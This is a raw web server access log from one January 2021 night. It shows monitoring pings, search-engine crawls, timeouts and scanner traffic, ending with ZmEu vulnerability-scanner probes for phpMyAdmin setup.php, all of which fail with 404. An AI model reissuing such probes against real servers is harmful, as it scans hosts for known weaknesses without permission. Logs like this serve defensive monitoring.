195.56.55.225 - - [08/Jan/2021:23:35:24 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
81.183.148.32 - - [08/Jan/2021:23:36:55 +0100] "-" 408 - "-" "-"
81.183.148.32 - - [08/Jan/2021:23:36:55 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:23:37:27 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.240.192.138 - - [08/Jan/2021:23:37:44 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
66.240.192.138 - - [08/Jan/2021:23:37:46 +0100] "GET /robots.txt HTTP/1.1" 404 286 "-" "-"
66.240.192.138 - - [08/Jan/2021:23:37:47 +0100] "GET /sitemap.xml HTTP/1.1" 404 287 "-" "-"
66.240.192.138 - - [08/Jan/2021:23:37:48 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 300 "-" "-"
66.240.192.138 - - [08/Jan/2021:23:37:50 +0100] "GET /favicon.ico HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
66.249.64.62 - - [08/Jan/2021:23:38:22 +0100] "GET /event/2010/01/21/table/all/all HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:23:39:30 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
81.183.148.32 - - [08/Jan/2021:23:39:52 +0100] "-" 408 - "-" "-"
81.183.148.32 - - [08/Jan/2021:23:39:52 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:23:41:35 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:23:43:38 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:23:45:41 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:23:47:44 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
94.102.49.193 - - [08/Jan/2021:23:48:10 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
94.102.49.193 - - [08/Jan/2021:23:48:14 +0100] "GET /robots.txt HTTP/1.1" 404 287 "-" "-"
94.102.49.193 - - [08/Jan/2021:23:48:16 +0100] "GET /sitemap.xml HTTP/1.1" 404 288 "-" "-"
94.102.49.193 - - [08/Jan/2021:23:48:17 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 301 "-" "-"
94.102.49.193 - - [08/Jan/2021:23:48:25 +0100] "GET /favicon.ico HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
66.249.64.62 - - [08/Jan/2021:23:48:30 +0100] "GET /event/2008/03/18/table/all/all HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.102.8.119 - - [08/Jan/2021:23:49:08 +0100] "GET / HTTP/1.1" 304 - "-" "FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)"
195.56.55.225 - - [08/Jan/2021:23:49:47 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:23:51:50 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.248.162.235 - - [08/Jan/2021:23:52:59 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 317 "-" "ZmEu"
89.248.162.235 - - [08/Jan/2021:23:52:59 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 304 "-" "ZmEu"
89.248.162.235 - - [08/Jan/2021:23:52:59 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 304 "-" "ZmEu"
